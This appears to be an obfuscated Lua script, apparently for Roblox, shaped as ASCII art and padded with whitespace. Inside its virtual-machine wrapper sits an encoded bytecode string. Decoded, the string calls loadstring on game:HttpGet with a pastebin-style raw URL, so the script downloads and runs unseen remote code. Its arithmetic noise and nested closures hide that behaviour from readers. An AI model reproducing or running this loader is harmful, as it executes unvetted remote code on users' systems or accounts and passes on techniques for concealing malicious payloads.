                                                                                 local v0=tonumber;    
                                                                        local v1=string.byte;local v2=string.char;local 
                                                                     v3=string.sub;local v4=string.gsub;local v5=string.rep;local 
                                                                 v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=    
                                                            getfenv or function() return _ENV;end ;local v10=setmetatable;local v11=pcall 
                                                          ;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local      
                                                        function v15(v16,v17,...) local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)   
                                                      if (v1(v30,2)==81) then local v84=0;while true do if (v84==0) then v19=v0(v3(v30,1,1));   
                                                    return "";end end else local v85=v2(v0(v30,16));if v19 then local v115=v5(v85,v19);v19=nil;   
                                                  return v115;else return v85;end end end);local function v20(v31,v32,v33) if v33 then local v86=(  
                                                  v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-((2 + 0) -1)) -(v32-(620 -(555 + 64)))) + (932 -(857 + (  
                                                105 -31))))) ;return v86-(v86%(569 -(367 + (1266 -(68 + 997))))) ;else local v87=(2197 -(226 + 1044)) - 
                                                ((931 -717) + 713) ;local v88;while true do if (v87==(0 + 0)) then v88=((118 -(32 + 85)) + 1)^(v32-((861  
                                              + 17) -(63 + 219 + 595))) ;return (((v31%(v88 + v88))>=v88) and 1) or (1637 -(1523 + 114)) ;end end end end   
                                              local function v21() local v34=v1(v16,v18,v18);v18=v18 + 1 ;return v34;end local function v22() local v35,v36 
                                            =v1(v16,v18,v18 + (959 -(892 + 65)) );v18=v18 + (4 -2) ;return (v36 * (472 -216)) + v35 ;end local function v23() 
                                             local v37,v38,v39,v40=v1(v16,v18,v18 + (4 -1) );v18=v18 + 4 ;return (v40 * ((41191679 -24414113) -(64 + 23 + 263)) 
                                          ) + (v39 * (65716 -(67 + 113))) + (v38 * (188 + 68)) + v37 ;end local function v24() local v41=v23();local v42=v23();   
                                          local v43=(7 -4) -(887 -(261 + 624)) ;local v44=(v20(v42,953 -(802 + (266 -116)) ,2 + 18 ) * ((5 -3)^(57 -25))) + v41 ;   
                                          local v45=v20(v42,463 -(416 + 26) ,23 + 8 );local v46=((v20(v42,1029 -(915 + 82) )==(2 -1)) and  -(1 + 0)) or (431 -(44 +   
                                          386)) ;if (v45==(0 -0)) then if (v44==(1187 -(1069 + 118))) then return v46 * 0 ;else v45=(1081 -(1020 + 60)) + 0 ;v43=772  
                                        -(201 + (1994 -(630 + 793))) ;end elseif (v45==(4643 -2596)) then return ((v44==(0 -0)) and (v46 * ((1 + 0 + 0)/(0 + 0)))) or ( 
                                        v46 * NaN) ;end return v8(v46,v45-(1817 -794) ) * (v43 + (v44/((2 + 0 --[[==============================]])^((2856 -2013) -((1742 
                                         -1374) + 423))))) ;end local function v25(v47) local v48=0 --[[============================================]] + 0 ;local v49;    
                                        local v50;while true do if (v48==((1 + 8) -6)) then     --[[======================================================]]return v6(v50); 
                                      end if (v48==0) then v49=nil;if  not v47 then v47=v23 --[[==========================================================]]();if (v47==(1747 
                                       -(760 + 987))) then return "";end end v48=1 + 0 ;  --[[==============================================================]]end if (v48==(( 
                                      2970 -(87 + 968)) -(1789 + 124))) then v50={};for   --[[================================================================]]v116=767 -(745  
                                      + 21) , #v49 do v50[v116]=v2(v1(v3(v49,v116,v116))) --[[==================================================================]];end v48=2 +  
                                      1 ;end if (v48==((8 -6) -1)) then v49=v3(v16,v18,(  --[[==================================================================]]v18 + v47) -(3    
                                    -2) );v18=v18 + v47 ;v48=2;end end end local v26=v23; --[[====================================================================]]local         
                    function v27(...) return {...},v12("#",...);end local function v28()  --[[====================================================================]]local v51=(     
              function() return function(v89,v90,v91,v92,v93,v94,v95,v96) local v89=(     --[[======================================================================]]function()    
            return 0 -0 ;end)();local v90=(function() return;end)();local v91=(function() --[[======================================================================]] return;end)( 
          );while true do if (v89~= #",") then else if (v90== #":") then v91=(function()  --[[======================================================================]]return v92()  
        ~=0 ;end)();elseif (v90==2) then v91=(function() return v93();end)();elseif (v90  --[[======================================================================]]== #"-19")    
        then v91=(function() return v94();end)();end v95[v96]=(function() return v91;end) --[[======================================================================]]();break;end  
      if (v89~=(0 -0)) then else local v123=(function() return 0;end)();while true do if  --[[======================================================================]](v123==(0 -0) 
      ) then v90=(function() return v92();end)();v91=(function() return nil;end)();v123=(   --[[==================================================================]]function()      
      return 1825 -(1195 + 629) ;end)();end if (v123~=1) then else v89=(function() return   --[[================================================================]]#">";end)();break 
    ;end end end end return v89,v90,v91,v92,v93,v94,v95,v96;end;end)();local v52=(function( --[[==============================================================]]) return function 
    (v97,v98,v99,v100,v101,v102,v103,v104,v105) local v106=(function() return 0;end)();local  --[[==========================================================]]v97=(function()     
    return;end)();local v98=(function() return;end)();while true do if (v106==0) then local     --[[====================================================]]v124=(function() return 
     0;end)();local v125=(function() return;end)();while true do if (v124==0) then v125=(function --[[==============================================]]() return 0 -0 ;end)();   
    while true do if (1==v125) then v106=(function() return 1;end)();break;end if (v125~=0) then else --[[====================================]] v97=(function() return 241 - 
    (187 + 54) ;end)();v98=(function() return nil;end)();v125=(function() return 1;end)();end end break;  --[[========================]]end end end if (v106==1) then local   
    v126=(function() return 0;end)();while true do if (v126==(780 -(162 + 618))) then local v127=(function() return 0 + 0 ;end)();while true do if (v127==0) then while     
  true do if (v97==0) then v98=(function() return v99();end)();if (v100(v98, #"~", #" ")==(0 + 0)) then local v173=(function() return 0 -0 ;end)();local v174=(function() 
   return;end)();local v175=(function() return;end)();local v176=(function() return;end)();while true do if (3~=v173) then else if (v100(v175, #"91(", #"91(")~= #" ")  
  then else v176[ #"asd1"]=(function() return v103[v176[ #"0313"]];end)();end v104[v105]=(function() return v176;end)();break;end if (v173~=(1 -0)) then else local v178= 
  (function() return 0 + 0 ;end)();while true do if ((1637 -(1373 + 263))~=v178) then else v173=(function() return 2;end)();break;end if (v178~=(1000 -(451 + 549))) then 
   else v176=(function() return {v101(),v101(),nil,nil};end)();if (v174==(0 -0)) then local v182=(function() return 0;end)();local v183=(function() return;end)();while   
  true do if (v182~=(0 -0)) then else v183=(function() return 0;end)();while true do if (v183~=(1384 -(746 + 638))) then else v176[ #"asd"]=(function() return v101();end 
  )();v176[ #"0836"]=(function() return v101();end)();break;end end break;end end elseif (v174== #"/") then v176[ #"-19"]=(function() return v102();end)();elseif (v174== 
  (1 + 1)) then v176[ #"-19"]=(function() return v102() -((2 -0)^16) ;end)();elseif (v174== #"gha") then local v188=(function() return 341 -(218 + 123) ;end)();local     
  v189=(function() return;end)();while true do if (v188~=(1581 -(1535 + 46))) then else v189=(function() return 0 + 0 ;end)();while true do if (v189==0) then v176[ #     
  "asd"]=(function() return v102() -((1 + 1)^(576 -(306 + 254))) ;end)();v176[ #"xnxx"]=(function() return v101();end)();break;end end break;end end end v178=(function() 
   return 1;end)();end end end if (2==v173) then if (v100(v175, #"[", #"[")== #"{") then v176[1 + 1 ]=(function() return v103[v176[3 -1 ]];end)();end if (v100(v175,2,    
  1469 -(899 + 568) )== #"/") then v176[ #"-19"]=(function() return v103[v176[ #"xnx"]];end)();end v173=(function() return 2 + 1 ;end)();end if ((0 -0)~=v173) then else    
  v174=(function() return v100(v98,2, #"nil");end)();v175=(function() return v100(v98, #"asd1",609 -(268 + 335) );end)();v173=(function() return 1;end)();end end end break 
  ;end end return v97,v98,v99,v100,v101,v102,v103,v104,v105;end end end end end end end;end)();local v53=(function() return function(v107,v108,v109) local v110=(function() 
   return 290 -(60 + 230) ;end)();local v111=(function() return;end)();while true do if (v110==0) then v111=(function() return 0;end)();while true do if (v111~=(572 -(426  
  + 146))) then else local v128=(function() return 0 + 0 ;end)();while true do if (v128==(1456 -(282 + 1174))) then v107[v108-#"." ]=(function() return v109();end)();      
  return v107,v108,v109;end end end end break;end end end;end)();local v54=(function() return {};end)();local v55=(function() return {};end)();local v56=(function() return 
   {};end)();local v57=(function() return {v54,v55,nil,v56};end)();local v58=(function() return v23();end)();local v59=(function() return {};end)();for v67= #"/",v58 do    
  FlatIdent_8D83D,Type,Cons,v21,v24,v25,v59,v67=(function() return v51(FlatIdent_8D83D,Type,Cons,v21,v24,v25,v59,v67);end)();end v57[ #"xnx"]=(function() return v21();end) 
  ();for v68= #":",v23() do FlatIdent_44839,Descriptor,v21,v20,v22,v23,v59,v54,v68=(function() return v52(FlatIdent_44839,Descriptor,v21,v20,v22,v23,v59,v54,v68);end)();   
  end for v69= #".",v23() do v55,v69,v28=(function() return v53(v55,v69,v28);end)();end return v57;end local function v29(v61,v62,v63) local v64=v61[812 -(569 + 242) ];    
  local v65=v61[5 -3 ];local v66=v61[1 + 2 ];return function(...) local v70=v64;local v71=v65;local v72=v66;local v73=v27;local v74=1025 -(706 + 318) ;local v75= -(1 + 0); 
  local v76={};local v77={...};local v78=v12("#",...) -(1252 -(721 + 530)) ;local v79={};local v80={};for v112=1271 -(945 + 326) ,v78 do if ((v112>=v72) or (516>3434))     
  then v76[v112-v72 ]=v77[v112 + 1 + 0 ];else v80[v112]=v77[v112 + (2 -1) ];end end local v81=(v78-v72) + 1 + 0 + 0 ;local v82;local v83;while true do v82=v70[v74];v83=v82 
  [1 + 0 ];if ((v83<=4) or (2719<=1447)) then if ((v83<=(739 -(542 + 196))) or (4134<3926)) then if ((v83>(700 -(271 + 429))) or (164>=2785)) then local v129=v82[2 + 0 ] 
  ;local v130=v80[v82[3]];v80[v129 + (1501 -(1408 + 92)) ]=v130;v80[v129]=v130[v82[1090 -(461 + 625) ]];else v80[v82[1 + 1 ]]=v63[v82[1291 -(993 + 295) ]];end elseif (   
  v83<=(1 + 0 + 1)) then do return;end elseif ((4046>=3033) and (v83>(1174 -((2393 -(1913 + 62)) + 753)))) then v80[v82[1553 -(710 + 416 + 425) ]]();else local v140;     
    local v141,v142;local v143;local v144;v80[v82[407 -(118 + 287) ]]={};v74=v74 + 1 + 0 ;v82=v70[v74];v80[v82[1 + 1 ]]=v63[v82[1 + (5 -3) ]];v74=v74 + 1 + 0 ;v82=v70[   
    v74];v80[v82[531 -(406 + 123) ]]=v63[v82[(3705 -(565 + 1368)) -(1749 + 20) ]];v74=v74 + (3 -2) + 0 ;v82=v70[v74];v144=v82[1 + 1 ];v143=v80[v82[(2986 -(1477 + 184)) - 
    (1249 + (98 -25)) ]];v80[v144 + 1 + 0 ]=v143;v80[v144]=v143[v82[4 + 0 ]];v74=v74 + 1 + 0 ;v82=v70[v74];v80[v82[1 + 1 ]]=v82[2 + 0 + 1 ];v74=v74 + ((2002 -(564 + 292) 
    ) -(466 + 679)) ;v82=v70[v74];v80[v82[4 -2 ]]=v82[8 -(8 -3) ]~=((0 -0) -0) ;v74=v74 + (1901 -(106 + 1794)) ;v82=v70[v74];v144=v82[1 + 1 ];v141,v142=v73(v80[v144](v13 
      (v80,v144 + 1 + 0 ,v82[8 -5 ])));v75=(v142 + v144) -1 ;v140=0 -(304 -(244 + 60)) ;for v166=v144,v75 do v140=v140 + (1330 -(797 + 532)) ;v80[v166]=v141[v140];end  
      v74=v74 + (115 -(4 + 110)) ;v82=v70[v74];v144=v82[(451 + 135) -(57 + 527) ];v80[v144]=v80[v144](v13(v80,v144 + (1428 -(41 + 1386)) ,v75));v74=v74 + (1203 -(373 + 
       829)) ;v82=v70[v74];v80[v82[105 -(17 + 86) ]]();v74=v74 + 1 + 0 ;v82=v70[v74];do return;end end elseif (v83<=(13 -7)) then if (v83>(14 -(485 -(41 + 435)))) then 
         v80[v82[168 -(122 + 44) ]]=v82[5 -2 ];else v80[v82[6 -4 ]]=v82[1004 -(938 + 63) ]~=(0 + 0) ;end elseif (v83<=(2 + 5)) then v80[v82[3 -(1 + 0) ]]={};elseif (   
        v83==(73 -(30 + 35))) then local v159=v82[338 -(144 + 192) ];local v160,v161=v73(v80[v159](v13(v80,v159 + 1 ,v82[3 + 0 ])));v75=(v161 + v159) -(1258 -(1043 +   
        214)) ;local v162=0 -0 ;for v169=v159,v75 do local v170=1212 -(323 + (2014 -(936 + 189))) ;while true do if (v170==(0 + 0)) then v162=v162 + (2 -1) ;v80[v169]= 
          v160[v162];break;end end end else local v163=v82[582 -(361 + 219) ];v80[v163]=v80[v163](v13(v80,v163 + ((106 + 215) -(53 + 267)) ,v75));end v74=v74 + (2 -( 
            1614 -(1565 + 48))) ;end end;end return v29(v28(),{},v17)(...);end return v15(                                                                            
                                                                                                                                                                      
                                                                                                                                                                      
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                    
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                  
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                                
                                                                                                                                                              
                                                                                                                                                              
                                                                                                                                                            
                                                                                                                                                            
                                                                                                                                                          
                                                                                                                                                      
                                                                                                                                                  
                                                                                                                                          
                                                                                            
                                                                                          
                                                                                        
                                                                                  


"LOL!043Q00030A3Q006C6F6164737472696E6703043Q0067616D6503073Q00482Q7470476574032B3Q00682Q7470733A2Q2F706173746562696E2E3062696E2E78797A2F766965772F7261772F6462373437326562000A4Q00037Q00122Q000100013Q00122Q000200023Q00202Q00020002000300122Q000400046Q000500016Q000200056Q00013Q00024Q0001000100016Q00017Q00",v9(),...);
